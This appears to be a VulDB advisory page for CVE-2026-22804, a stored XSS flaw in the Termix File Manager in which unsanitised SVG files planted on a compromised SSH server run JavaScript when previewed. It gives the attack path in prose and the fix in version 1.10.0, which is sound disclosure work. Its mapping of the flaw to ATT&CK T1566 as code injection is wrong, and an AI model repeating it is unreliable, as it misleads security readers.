CVE-2026-22804 in Termix
Summary
by MITRE • 01/13/2026
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 01/17/2026
The vulnerability CVE-2026-22804 represents a critical stored cross-site scripting flaw in Termix version 1.7.0 through 1.9.0, specifically within the File Manager component that handles SVG file rendering. This issue stems from inadequate input sanitization mechanisms that fail to properly validate or escape SVG content before displaying it to users, creating a persistent security risk that can be exploited through malicious file uploads.
The technical exploitation occurs when an attacker compromises an SSH server managed through Termix and uploads a malicious SVG file containing embedded JavaScript code. When legitimate Termix users attempt to preview or view this compromised file through the web interface, the SVG rendering process executes the embedded malicious script within the context of the application's security domain. This vulnerability is particularly dangerous because it leverages the trust relationship between the Termix application and its users, allowing attackers to execute arbitrary code in the victim's browser session.
The attack vector specifically targets the FileViewer.tsx component located in src/ui/desktop/apps/file-manager, which serves as the primary interface for displaying file content within the Termix desktop environment. This component's failure to implement proper content sanitization for SVG files creates a persistent XSS vulnerability that can be triggered repeatedly each time users access or preview the malicious file. The vulnerability affects users who have access to the Termix platform and can potentially escalate to more severe attacks including session hijacking, credential theft, or privilege escalation within the application's security boundaries.
This vulnerability maps directly to CWE-79, which defines Cross-Site Scripting as a weakness that occurs when an application includes untrusted data in a new web page without proper validation or escaping, allowing attackers to inject malicious scripts. The ATT&CK framework categorizes this as a code injection technique under T1566, specifically targeting the application's rendering capabilities to execute malicious payloads. The exploitation requires an attacker to first compromise an SSH server to gain upload privileges, making this a multi-stage attack that combines system compromise with application-level exploitation.
The remediation involves upgrading to Termix version 1.10.0, which implements proper input sanitization and content validation for SVG files before rendering. Organizations should also implement additional security measures including automated file type validation, content disposition headers, and regular security audits of file upload components. The fix should include comprehensive sanitization of SVG content to remove or escape potentially dangerous elements and attributes that could enable script execution. Security teams should also consider implementing network-based intrusion detection systems to monitor for suspicious file upload activities and establish proper access controls to limit upload privileges to trusted users only.